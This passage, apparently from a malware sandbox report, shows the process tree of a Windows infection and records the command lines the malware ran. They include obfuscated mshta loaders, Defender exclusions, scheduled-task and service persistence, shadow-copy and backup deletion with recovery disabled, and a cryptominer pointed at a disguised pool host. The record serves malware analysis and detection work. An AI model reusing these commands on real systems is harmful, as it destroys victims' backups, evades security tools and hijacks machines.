C:\Users\Admin\Documents\KZHbo5MwuGzPcOkjBIawqxCB.exe"C:\Users\Admin\Documents\KZHbo5MwuGzPcOkjBIawqxCB.exe"6⤵PID:6828
-
C:\Users\Admin\Documents\KZHbo5MwuGzPcOkjBIawqxCB.exe"C:\Users\Admin\Documents\KZHbo5MwuGzPcOkjBIawqxCB.exe"7⤵PID:2720
-
-
-
C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe"C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe"6⤵PID:6316
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )7⤵PID:7552
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\pHUt5H4J_Motq6mvJW0SYoPN.exe") do taskkill -IM "%~nXW" -f8⤵PID:7292
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu99⤵PID:3732
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )10⤵PID:5040
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f11⤵PID:5996
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE10⤵PID:8764
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "pHUt5H4J_Motq6mvJW0SYoPN.exe" -f9⤵
- Kills process with taskkill
PID:5404
-
-
-
-
-
C:\Users\Admin\Documents\HNKfxSRem0T3jMAthYLDoe7B.exe"C:\Users\Admin\Documents\HNKfxSRem0T3jMAthYLDoe7B.exe"6⤵PID:4160
-
C:\Users\Admin\AppData\Roaming\4283863.exe"C:\Users\Admin\AppData\Roaming\4283863.exe"7⤵PID:6708
-
-
C:\Users\Admin\AppData\Roaming\3036685.exe"C:\Users\Admin\AppData\Roaming\3036685.exe"7⤵PID:7300
-
-
C:\Users\Admin\AppData\Roaming\1003665.exe"C:\Users\Admin\AppData\Roaming\1003665.exe"7⤵PID:7352
-
-
C:\Users\Admin\AppData\Roaming\6439199.exe"C:\Users\Admin\AppData\Roaming\6439199.exe"7⤵PID:6116
-
-
-
C:\Users\Admin\Documents\u7BRYYFkimCy8DlNrFj_AND6.exe"C:\Users\Admin\Documents\u7BRYYFkimCy8DlNrFj_AND6.exe"6⤵PID:6740
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "u7BRYYFkimCy8DlNrFj_AND6.exe" /f & erase "C:\Users\Admin\Documents\u7BRYYFkimCy8DlNrFj_AND6.exe" & exit7⤵PID:8824
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "u7BRYYFkimCy8DlNrFj_AND6.exe" /f8⤵
- Kills process with taskkill
PID:5456
-
-
-
-
C:\Users\Admin\Documents\soKeeiEuKYaq8ZYz_lyopQmS.exe"C:\Users\Admin\Documents\soKeeiEuKYaq8ZYz_lyopQmS.exe"6⤵PID:6728
-
C:\Users\Admin\Documents\soKeeiEuKYaq8ZYz_lyopQmS.exe"C:\Users\Admin\Documents\soKeeiEuKYaq8ZYz_lyopQmS.exe"7⤵PID:6972
-
-
-
C:\Users\Admin\Documents\hXRibBhaF6nzPoiNV8h4zsBG.exe"C:\Users\Admin\Documents\hXRibBhaF6nzPoiNV8h4zsBG.exe"6⤵PID:6568
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 3887⤵
- Program crash
PID:5260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 6607⤵
- Program crash
PID:8804
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6568 -s 6967⤵
- Program crash
PID:9016
-
-
-
C:\Users\Admin\Documents\lytamxAHA47Z3KcXdjVoN2o3.exe"C:\Users\Admin\Documents\lytamxAHA47Z3KcXdjVoN2o3.exe"6⤵PID:6012
-
C:\Users\Admin\Documents\lytamxAHA47Z3KcXdjVoN2o3.exeC:\Users\Admin\Documents\lytamxAHA47Z3KcXdjVoN2o3.exe7⤵PID:7544
-
-
-
C:\Users\Admin\Documents\dIqB_wuQkrYXpW9RlDBPPOqv.exe"C:\Users\Admin\Documents\dIqB_wuQkrYXpW9RlDBPPOqv.exe"6⤵PID:6156
-
-
C:\Users\Admin\Documents\Bevx3ebAy5NOdGW9kyrgp_mx.exe"C:\Users\Admin\Documents\Bevx3ebAy5NOdGW9kyrgp_mx.exe"6⤵PID:6708
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Bevx3ebAy5NOdGW9kyrgp_mx.exe" /f & erase "C:\Users\Admin\Documents\Bevx3ebAy5NOdGW9kyrgp_mx.exe" & exit7⤵PID:6844
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Bevx3ebAy5NOdGW9kyrgp_mx.exe" /f8⤵
- Kills process with taskkill
PID:8000
-
-
-
-
C:\Users\Admin\Documents\83joLsPJryysEImE5llS5yTE.exe"C:\Users\Admin\Documents\83joLsPJryysEImE5llS5yTE.exe"6⤵PID:5468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 6607⤵
- Program crash
PID:4232
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 6767⤵
- Program crash
PID:5668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 6887⤵
- Program crash
PID:500
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 6687⤵
- Program crash
PID:6116
-
-
-
C:\Users\Admin\Documents\OEGwMIQSV5ddemtXMf9Kvg0f.exe"C:\Users\Admin\Documents\OEGwMIQSV5ddemtXMf9Kvg0f.exe"6⤵PID:6280
-
-
C:\Users\Admin\Documents\w1xydbzSMMYZL6gn2Jpq0wv6.exe"C:\Users\Admin\Documents\w1xydbzSMMYZL6gn2Jpq0wv6.exe"6⤵PID:7404
-
C:\Users\Admin\AppData\Local\Temp\is-N30JM.tmp\w1xydbzSMMYZL6gn2Jpq0wv6.tmp"C:\Users\Admin\AppData\Local\Temp\is-N30JM.tmp\w1xydbzSMMYZL6gn2Jpq0wv6.tmp" /SL5="$10560,138429,56832,C:\Users\Admin\Documents\w1xydbzSMMYZL6gn2Jpq0wv6.exe"7⤵PID:7576
-
C:\Users\Admin\AppData\Local\Temp\is-PREE3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-PREE3.tmp\Setup.exe" /Verysilent8⤵PID:4160
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵PID:776
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579443 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:9424
-
-
-
-
-
-
C:\Users\Admin\Documents\Vlkg8762gntS5vFyQnpLK1Kp.exe"C:\Users\Admin\Documents\Vlkg8762gntS5vFyQnpLK1Kp.exe"6⤵PID:7620
-
C:\Users\Admin\Documents\Vlkg8762gntS5vFyQnpLK1Kp.exe"C:\Users\Admin\Documents\Vlkg8762gntS5vFyQnpLK1Kp.exe" -q7⤵PID:7256
-
-
-
C:\Users\Admin\Documents\X07aXZhkNfOyacqmKxa4P7c1.exe"C:\Users\Admin\Documents\X07aXZhkNfOyacqmKxa4P7c1.exe"6⤵PID:7708
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\X07AXZ~1.DLL,s C:\Users\Admin\DOCUME~1\X07AXZ~1.EXE7⤵PID:6832
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\X07AXZ~1.DLL,iWMm8⤵PID:7432
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\X07AXZ~1.DLL9⤵PID:8440
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵PID:5924
-
C:\Users\Admin\AppData\Local\Temp\is-M9EIJ.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-M9EIJ.tmp\MediaBurner2.tmp" /SL5="$30368,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵PID:5316
-
C:\Users\Admin\AppData\Local\Temp\is-GO31J.tmp\ultradumnibour.exe"C:\Users\Admin\AppData\Local\Temp\is-GO31J.tmp\ultradumnibour.exe" /S /UID=burnerch27⤵PID:6044
-
C:\Program Files\Uninstall Information\KEGHIABFFS\ultramediaburner.exe"C:\Program Files\Uninstall Information\KEGHIABFFS\ultramediaburner.exe" /VERYSILENT8⤵PID:8148
-
C:\Users\Admin\AppData\Local\Temp\is-TQBAN.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-TQBAN.tmp\ultramediaburner.tmp" /SL5="$402E4,281924,62464,C:\Program Files\Uninstall Information\KEGHIABFFS\ultramediaburner.exe" /VERYSILENT9⤵PID:7152
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:7640
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\49-14ee8-70d-2b0b5-cfb8d23d53a74\Kaepowygaeto.exe"C:\Users\Admin\AppData\Local\Temp\49-14ee8-70d-2b0b5-cfb8d23d53a74\Kaepowygaeto.exe"8⤵PID:7140
-
-
C:\Users\Admin\AppData\Local\Temp\f8-c3558-2a7-399aa-ab31cd7b31afa\Howiwafaecu.exe"C:\Users\Admin\AppData\Local\Temp\f8-c3558-2a7-399aa-ab31cd7b31afa\Howiwafaecu.exe"8⤵PID:4216
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 7049⤵PID:7312
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:5800
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵PID:5932
-
-
-
-
-
-
C:\Users\Admin\Documents\gD2Wa3d8OfEdWgVPMtbiMaeH.exe"C:\Users\Admin\Documents\gD2Wa3d8OfEdWgVPMtbiMaeH.exe"2⤵
- Executes dropped EXE
PID:4072 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\GD2WA3~1.DLL,s C:\Users\Admin\DOCUME~1\GD2WA3~1.EXE3⤵PID:6952
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GD2WA3~1.DLL,gi9TNW5iMnJl4⤵PID:4884
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\GD2WA3~1.DLL5⤵PID:8844
-
-
C:\Windows\SysWOW64\RUNDLL32.EXEC:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\GD2WA3~1.DLL,HgoTaDJCS0Y=5⤵PID:2364
-
C:\Windows\system32\rundll32.exeC:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 318046⤵PID:2188
-
C:\Windows\system32\ctfmon.exectfmon.exe7⤵PID:9048
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp6EE4.tmp.ps1"5⤵PID:6804
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\yuOMwcQFh1wquc52IaH03wkF.exe") do taskkill -IM "%~nXW" -f1⤵PID:4604
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu92⤵
- Executes dropped EXE
PID:64 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )3⤵PID:4544
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f4⤵PID:5412
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE3⤵PID:5912
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "yuOMwcQFh1wquc52IaH03wkF.exe" -f2⤵
- Kills process with taskkill
PID:4688
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:5992 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:5512
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3744
-
C:\ProgramData\jeqpu\bagetu.exeC:\ProgramData\jeqpu\bagetu.exe start1⤵PID:7988
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5272
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding A1EE5E636B4BB016C3CF1EFD27D5114F C2⤵PID:6052
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 2EF6AD14C981A2B26C9DE2A3166031C62⤵PID:5076
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 1EC328776C23B53E4F093F2BAF1966DD C2⤵PID:8408
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding F625CAB07B40E4445FA1063A73BCA1A0 C2⤵PID:9020
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:9004 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:9028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9028 -s 6243⤵
- Program crash
PID:9108
-
-
-
C:\Users\Admin\AppData\Local\Temp\C9D5.exeC:\Users\Admin\AppData\Local\Temp\C9D5.exe1⤵PID:6424
-
C:\Users\Admin\AppData\Local\Temp\DB89.exeC:\Users\Admin\AppData\Local\Temp\DB89.exe1⤵PID:5152
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7628
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{045f237e-a524-7344-a4b1-51621a78ef66}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:8076
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000180"2⤵PID:5648
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:632
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:5688
-
C:\Users\Admin\AppData\Local\Temp\39.exeC:\Users\Admin\AppData\Local\Temp\39.exe1⤵PID:6024
-
C:\Users\Admin\AppData\Local\Temp\914.exeC:\Users\Admin\AppData\Local\Temp\914.exe1⤵PID:8492
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\cjxnpmss\2⤵PID:8920
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\kcltqdpj.exe" C:\Windows\SysWOW64\cjxnpmss\2⤵PID:7780
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create cjxnpmss binPath= "C:\Windows\SysWOW64\cjxnpmss\kcltqdpj.exe /d\"C:\Users\Admin\AppData\Local\Temp\914.exe\"" type= own start= auto DisplayName= "wifi support"2⤵PID:6820
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description cjxnpmss "wifi internet conection"2⤵PID:4236
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start cjxnpmss2⤵PID:8076
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul2⤵PID:9044
-
-
C:\Users\Admin\iifaduld.exe"C:\Users\Admin\iifaduld.exe" /d"C:\Users\Admin\AppData\Local\Temp\914.exe"2⤵PID:2648
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sspknevn.exe" C:\Windows\SysWOW64\cjxnpmss\3⤵PID:8036
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config cjxnpmss binPath= "C:\Windows\SysWOW64\cjxnpmss\sspknevn.exe /d\"C:\Users\Admin\iifaduld.exe\""3⤵PID:8904
-
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start cjxnpmss3⤵PID:5412
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:8664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\5277.bat" "3⤵PID:6844
-
-
-
C:\Users\Admin\AppData\Local\Temp\2131.exeC:\Users\Admin\AppData\Local\Temp\2131.exe1⤵PID:5596
-
C:\Users\Admin\AppData\Local\Temp\2C5D.exeC:\Users\Admin\AppData\Local\Temp\2C5D.exe1⤵PID:8312
-
C:\Users\Admin\AppData\Local\Temp\4CE6.exeC:\Users\Admin\AppData\Local\Temp\4CE6.exe1⤵PID:6588
-
C:\Users\Admin\AppData\Local\Temp\55C1.exeC:\Users\Admin\AppData\Local\Temp\55C1.exe1⤵PID:5644
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start2⤵PID:9148
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 03⤵PID:5744
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat3⤵PID:3012
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:632
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:10412
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet3⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:4868 -
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:9656
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet3⤵PID:7404
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:6924
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no3⤵PID:5844
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete3⤵PID:2276
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete4⤵PID:9664
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe3⤵PID:10900
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe2⤵PID:5788
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7240
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:9332
-
-
C:\Users\Admin\AppData\Local\Temp\BAF4.exeC:\Users\Admin\AppData\Local\Temp\BAF4.exe1⤵PID:6824
-
C:\Users\Admin\Documents\Update.exe"C:\Users\Admin\Documents\Update.exe"2⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\Red1_.exe"C:\Users\Admin\AppData\Local\Temp\Red1_.exe"3⤵PID:6492
-
-
C:\Users\Admin\AppData\Local\Temp\Clip_.exe"C:\Users\Admin\AppData\Local\Temp\Clip_.exe"3⤵PID:3664
-
-
C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"3⤵PID:6712
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit4⤵PID:9888
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'5⤵
- Creates scheduled task(s)
PID:10020
-
-
-
C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"4⤵PID:9036
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit5⤵PID:9812
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'6⤵
- Creates scheduled task(s)
PID:8928
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"5⤵PID:4520
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth5⤵PID:10420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"3⤵PID:7292
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit4⤵PID:10040
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'5⤵
- Creates scheduled task(s)
PID:4364
-
-
-
C:\Users\Admin\AppData\Roaming\VideoDriver.exe"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"4⤵PID:3752
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit5⤵PID:9100
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'6⤵
- Creates scheduled task(s)
PID:4632
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"5⤵PID:10080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"3⤵PID:9172
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\BAF4.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\BAF4.exe"2⤵PID:1328
-
